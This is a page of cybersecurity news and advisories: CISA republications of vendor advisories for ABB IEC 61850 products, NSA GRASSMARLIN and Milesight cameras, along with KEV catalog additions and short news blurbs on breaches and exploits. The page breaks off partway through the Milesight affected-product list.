is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-13 Date Revision Summary 2026-04-13 1 Initial version. 2026-04-30 2 Initial CISA Republication of ABB PSIRT 7PAA017341 advisory Legal Notice and Terms of Use

View CSAF Summary This vulnerability was privately reported relating to ABB’s implementation of the IEC 61850 communication stack for MMS client applications used in some Automation control system products. Note: IEC 61850 communication typically supports MMS and GOOSE protocols. Some ABB products support both, others only MMS (e.g. S+ Operations and PM 877). In any case, GOOSE communication is not impacted by this reported vulnerability. If an attacker gains access to a site’s IEC 61850 network, then exploiting this vulnerability will result in a device fault (PM 877, CI850 and CI868 modules) and will require a manual restart. If this attack is directed at a S+ Operations node running IEC 61850 connectivity, this will result in a crash in the IEC 61850 communication driver which, if continued a repeating basis, will also result in a denial-of-service situation. Note that this does not have an impact on the overall availability and functionality of the S+ Operations node, only the IEC 61850 communication function. The System 800xA IEC61850 Connect is not affected. The following versions of ABB System 800xA, Symphony Plus IEC 61850 are affected: AC800M Product line (System 800xA) CI868 Symphony Plus SD Series CI850 Symphony Plus MR (Melody Rack) PM 877 S+ Operations Firmware <=6.0.0303.0, <=6.1.0031.0 , <=6.1.1004.0 , <=6.1.1202.0 , <=6.2.0006.0 , 6.1.1-3, 7.0, A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005, C_0, >=3.10|<=3.52, 3.53, 3.3, 2.3, 2.2, 2.1, 3.4 () CVSS Vendor Equipment Vulnerabilities v3 6.5 ABB ABB System 800xA, Symphony Plus IEC 61850 Improper Validation of Specified Quantity in Input Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-3756 A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed above. An attacker with access to IEC 61850 networks could exploit the vulnerability by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. The System 800xA IEC61850 Connect is not affected. Note: This vulnerability does not impact on the overall availability and functionality of the S+ Operations node, only the 61850 communication function. View CVE Details Affected Products ABB System 800xA, Symphony Plus IEC 61850 Vendor: ABB Product Version:   Product Status: fixed, known_affected Remediations Vendor fix ABB advises all customers to review their installations to determine if they are using an impacted product as listed above, no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below: - CI868 (for AC 800M) Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in 6.1.1 and 7.0 tracks for 800xA. AC 800M 6.1.1-3 is planned for Q2 2027, AC 800M 7.0 has been released in December 2025. - CI850 (for Symphony Plus SD Series) Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in version C_0 or later (planned Q2 2026). - PM 877 (Symphony Plus MR) Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected with firmware version 3.53 or later (planned Q1 2026). - S+ Operations Versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in version 3.4 or later (released in January 2026). ABB recommends customers apply updates, as they become available, at their earliest convenience. It is also advisable to review the Mitigating Factors, Workarounds and General security recommendations sections for additional actions which may help reduce overall risk. Mitigation The vulnerabilities announced in this Advisory for ABB Process Automation products require that an attacker has access to the system network and hosts which are generally expected to be protected. Process Control and IEC 61850 networks are NOT recommended to be exposed directly to Internet connections. If these networks are not properly isolated, then connected components may be remotely exploitable as described in this advisory. To exploit the vulnerability, an attacker with remote network access can send a specially crafted packet to the PM 877, CI850 and CI868 modules which causes the fault of these devices. S+ Operations only implements 61850 client services and therefore are not intended to listen to in-coming connection requests. However, if a specially crafted message is sent anyway, it can still cause the 61850-communication driver to crash. The usage of a perimeter firewall to allow legitimate client communications is an effective mitigation. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available. Assess the installation specific risk based on this advisory. Use the recommendations described under “Mitigating factors” or “Recommended immediate actions”. Relevant CWE: CWE-1284 Improper Validation of Specified Quantity in Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Acknowledgments Hitachi Energy reported this vulnerability to ABB Global. ABB Global reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What is the scope of the vulnerability? - An attacker having access to the IEC 61850 network can force the ABB hardware devices to go to ‘fault’ state by sending a specially crafted 61850 packet. This will result in a denial-of-service situation affecting the primary functionality of the listed devices and requiring a manual reset. In the same way this vulnerability can cause the unavailability of the S+ Operations 61850 connectivity, if continued on a repeating basis (but not the whole S+ Operations node). The System 800xA IEC61850 Connect is not affected. What causes the vulnerability? - The vulnerability is caused by a weakness in the message processing in the IEC 61850 communication stack. What is CI868? - CI868 is a module used in AC800M product line (System 800xA) for IEC 61850 communication. What is CI850? - CI868 is a module used in Symphony Plus SD Series product line for IEC 61850 communication. What is PM 877? - PM 877 is a controller used in Symphony Plus MR (Melody Rack) product line for IEC 61850 communication. What is S+ Operations? - S+ Operations is the Human Machine Interface for supervision and control of Symphony based control or SCADA systems. It is a module used in AC800M product line (System 800xA) for IEC 61850 communication. What might an attacker use the vulnerability to do? - An attacker with access to IEC 61850 networks could exploit the vulnerability by sending a specially crafted 61850 packet to the S+ products, forcing the Communication Interfaces to fault modes or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. How could an attacker exploit the vulnerability? - An attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the net-work with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. Can functional safety be affected by an exploit of this vulnerability? - Functional safety systems are not affected by these vulnerabilities. What does the update do? - The update removes the vulnerability by modifying the way that the IEC 61850 stack, used by the ABB Process Automation Products described above, manages 61850 incoming messages. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, ABB received information about this vulnerability through responsible disclosure. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 7PAA020125 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-13 Date Revision Summary 2026-04-13 1 Initial version. 2026-04-30 2 Initial CISA Republication of ABB PSIRT 7PAA020125 advisory Legal Notice and Terms of Use

Attackers can already find, connect to, and probe your exposed AI agent infrastructure. AIMap gives defenders that same visibility. Built by Bishop Fox, this open-source tool discovers, scores, and tests exposed AI endpoints so you can understand your real attack surface before someone else does.

Losses from crypto hacks have topped $630 million in April across more than 25 hacks, with DeFi dominating major incidents and exploits accelerating despite security updates.

The critical CVE-2026-41940 authentication bypass vulnerability in cPanel, WHM, and WP Squared is being actively exploited in the wild and has been leveraged in attempts since late February. [...]

In another police action, European police arrested 10 people and took down three scam centers, estimated to have stolen over $58 million from victims around the world.

Global financial institutions are panicked over Anthropic's new superhacker AI model. Cyber experts aren't quite as worried.

Microsoft gets to offer OpenAI's tech to its cloud customers and doesn't have to pay for it. "We fully plan to exploit it," Nadella said.

Multiple official SAP npm packages were compromised in what is believed to be a TeamPCP supply-chain attack to steal credentials and authentication tokens from developers' systems. [...]

Hackers are exploiting two authentication bypass vulnerabilities in the Qinglong open-source task scheduling tool to deploy cryptominers on developers' servers. [...]

Wiz used an AI reverse-engineering tool to pinpoint a vulnerability that previously would have been too costly and time-consuming to undertake.

Flaws in OpenEMR's platform — used by more than 100,000 healthcare providers — enabled database compromise, remote code execution, and data theft.

The Ukrainian police have arrested three individuals who hacked more than 610,000 Roblox gaming accounts and sold them for a profit of $225,000. [...]

A critical vulnerability affecting all but the latest versions of cPanel and the WebHost Manager (WHM) dashboard could be exploited to obtain access to the control panel without authentication. [...]

The emerging ransomware has been deployed against victims of the TeamPCP supply chain attacks, but organizations should think twice before paying for a decryptor.

The government of Sri Lanka has lost more than $3 million in two recent, separate cybersecurity incidents as the country continues to recover from its 2022 debt crisis.

A single third-party OAuth integration can become a direct path into your environment. Push explains how the Vercel breach shows a compromised OAuth app can lead to widespread impact across downstream customers. [...]

An analysis of the destructive malware reveals sophisticated living-off-the-land (LotL) techniques and detailed strategies for the widespread deletion of data.

In early March, GitHub patched a critical remote code execution vulnerability (CVE-2026-3854) that could have allowed attackers to access millions of private repositories. [...]

The vulnerability behind ZetaChain's $334,000 exploit had been reported through its bug bounty program before the attack but was dismissed.

Adapting Zero Trust Principles to Operational Technology CISA, in coordination with the Department of War, Department of Energy, Federal Bureau of Investigation, and Department of State, released Adapting Zero Trust Principles to Operational Technology, joint guidance for organizations applying zero trust (ZT) principles to operational technology (OT). Zero trust is a modern, adaptive approach to cybersecurity that eliminates implicit trust and requires continuously validating access based on identity, context, and risk. With advancements in technology, OT systems that were traditionally isolated or manually operated are now increasingly interconnected, digitally monitored, and remotely controlled. This IT-OT convergence introduces new cybersecurity risks that make perimeter-based defenses and implicit trust models inadequate for safeguarding OT systems and the critical physical processes they control. This guidance supports OT owners and operators in addressing the unique challenges of transitioning to a ZT architecture, considering technology gaps from legacy infrastructure, operational constraints, and safety requirements. It focuses on establishing comprehensive asset visibility, proactively addressing supply chain risks, and implementing robust identity and access management while stressing the importance of layered security measures—including network segmentation, secure communication protocols, and vulnerability management. To learn more about ZT principles, visit Zero Trust     CISA Product Survey We welcome your feedback. CISA Product Survey

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to secure their Windows systems against a vulnerability exploited in zero-day attacks. [...]

The apparent hacker claimed to have breached other prediction markets and planned to release the data in the next few days.

The North Korean group is using stolen victim videos, AI-generated avatars, and fake Zoom calls to scale malware attacks against cryptocurrency executives.

Researchers are warning that the VECT 2.0 ransomware has a problem in the way it handles encryption nonces that leads to permanently destroying larger files rather than encrypt them. [...]

Hackers are targeting sensitive information stored in the LiteLLM open-source large-language model (LLM) gateway by exploiting a critical vulnerability  tracked as CVE-2026-42208. [...]

Chris Inglis was the head civilian in charge at the NSA when the Snowden leaks exploded. He gets candid about mistakes the organization made, and what CISOs need to know about spotting potential threats, media disclosures, and "enculturation."

When 0APT and KryBit attacked each other, they exposed infrastructure and operational data, giving defenders rare insight into ransomware operations.

The malware has filled the gap created by last year's law enforcement takedowns of Lumma and Rhadamanthys.

Vimeo has disclosed that data belonging to some of its customers and users has been accessed without authorization following the recent breach at the Anodot data anomaly detection company. [...]

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.  Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple vulnerabilities have been discovered in Oracle products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

A vulnerability has been discovered in OpenSSH which could allow for authentication bypass. OpenSSH (Open Secdure Shell) is an open-source suite of secure networking utilities based on the SSH protocol. It provides encrypted communication sessions over unsecured networks in a client-server architecture, primarily used for remote login and secure file transfers. Successful exploitation of the vulnerability could provide an attacker with root access to all the servers an organization has, if the vulnerable protocol runs on them.

A 19-year-old dual United States and Estonian citizen arrested in Finland earlier this month faces federal charges in the U.S. alleging he was a prolific member of the notorious Scattered Spider hacking collective. [...]

Attackers continue to scale a campaign to seed Open VSX with seemingly benign VS Code extensions that spread self-propagating malware.

Application security company Checkmarx has confirmed that the LAPSUS$ threat group leaked data stolen from its private GitHub repository. [...]

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to disclose sensitive information. The following versions of NSA GRASSMARLIN are affected: GRASSMARLIN vers:all/* CVSS Vendor Equipment Vulnerabilities v3 5.5 NSA NSA GRASSMARLIN Improper Restriction of XML External Entity Reference Background Critical Infrastructure Sectors: Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-6807 A vulnerability in GRASSMARLIN v3.2.1 allows crafted session data to trigger improper handling of XML input, which may result in unintended exposure of sensitive information. The flaw stems from insufficient hardening of the XML parsing process. View CVE Details Affected Products NSA GRASSMARLIN Vendor: NSA Product Version: NSA GRASSMARLIN: vers:all/* Product Status: known_affected Remediations Vendor fix NSA has indicated that the GRASSMARLIN project has reached end-of-life status as of 2017 and is no longer supported. The project is archived, and no patches or further updates are planned or expected. Relevant CWE: CWE-611 Improper Restriction of XML External Entity Reference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Acknowledgments Grady DeRosa reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-28 Date Revision Summary 2026-04-28 1 Initial Publication Legal Notice and Terms of Use

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2024-1708 ConnectWise ScreenConnect Path Traversal Vulnerability CVE-2026-32202 Microsoft Windows Protection Mechanism Failure Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.  Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

A newly discovered threat actor is using Microsoft Teams, AWS S3 buckets, and custom "Snow" malware in a multipronged campaign.

A researcher discovered five different exploit paths that stem from an architectural weakness in how Windows' Remote Procedure Call (RPC) mechanism handles connections to unavailable services.

Researchers have uncovered a malware framework dubbed "fast16" that predates Stuxnet by five years.

Some fear frontier LLMs like Claude Mythos and OpenAI's GPT-5.5 will lead to cybersecurity annihilation. Ari Herbert-Voss notes this could be an opportunity.

Forgotten integrations, shadow IT, SaaS, and now shadow AI and agents are everywhere, and attackers don't need sophisticated AI models to take advantage.

In the past six months, companies have seen a significant influx of AI-powered phishing, as cyberattackers progress from small campaigns to 1-to-1 personalized attacks.

Lazarus continues leveraging ClickFix for initial access and data theft: in this case, against Mac-centric organizations and their high-value leaders.

CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2024-7399 Samsung MagicINFO 9 Server Path Traversal Vulnerability CVE-2024-57726 SimpleHelp Missing Authorization Vulnerability CVE-2024-57728 SimpleHelp Path Traversal Vulnerability CVE-2025-29635 D-Link DIR-823X Command Injection Vulnerability  These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.  Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

The threat actor gave itself plenty of options to support command and control, tapping Microsoft Outlook, Slack, Discord, and file.io for online espionage.

The Chinese state-sponsored cyber threat is known for moving fast and trying odd attack vectors; now it's branching out in tools, victimology, and TTPs.

China's state-backed groups are now using covert networks of compromised devices to execute attacks in a low-cost, low-risk, and deniable way.

Cisco found and fixed a significant vulnerability in the way Anthropic handles memories, but experts warn that mishandled memory files will continue to threaten AI systems.

View CSAF Summary Successful exploitation of these vulnerabilities could crash the device being accessed or allow remote code execution. The following versions of Milesight Cameras are affected: MS-Cxx63-PD <=51.7.0.77-r12 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx64-xPD <=51.7.0.77-r12 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx73-xPD <=51.7.0.77-r12 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx75-xxPD <=51.7.0.77-r12 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx83-xPD <=51.7.0.77-r12 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx74-PA <=3x.8.0.3-r11 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C8477-HPG1 <=63.8.0.4-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C8477-PC <=48.8.0.4-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5321-FPE <=62.8.0.4-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx62-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx52-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-xxxGPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx61-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx67-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx71-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx41-xxxPE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx76-PE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx65-PE <=61.8.0.5-r2 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-xxxG1 <=63.8.0.5-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx62-xxxG1 <=63.8.0.5-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-xxxG1 <=63.8.0.5-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-CQxx31-xxxG1 <=CQ_63.8.0.5-r1 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-CQxx68-xxxG1 <=CQ_63.8.0.5-r1 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-CQxx72-xxxG1 <=CQ_63.8.0.5-r1 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-NxE <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-xxC <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-xxE <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-xxG <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-xxH <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Nxxxx-xxT <=7x.9.0.19-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) PMC8266-FPE <=PO_61.8.0.4_LPR (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) PMC8266-FGPE <=PO_61.8.0.4_LPR (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) PM3322-E <=PI_61.8.0.3_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RIPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5366-X12RIPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4RIPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RIVPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-RFIVPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4RIVPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-RFIVPG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RIWG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4RIWG1 <=T_63.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5510-GVH <=T_47.8.0.4_LPR-r7 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5510-GH <=T_47.8.0.4_LPR-r6 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5511-GVH <=T_47.8.0.4_LPR-r6 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2966-X12TPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5366-X12PE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4PE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2966-X12TVPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RVPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS5366-X12VPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4VPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4441-X36RPE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4441-X36RE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS4466-X4RWE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-X4WE <=T_61.8.0.4_LPR-r3 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2964-RFLPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2972-RFLPC <=T_45.8.0.3-r9 (CVE-2026-28747, 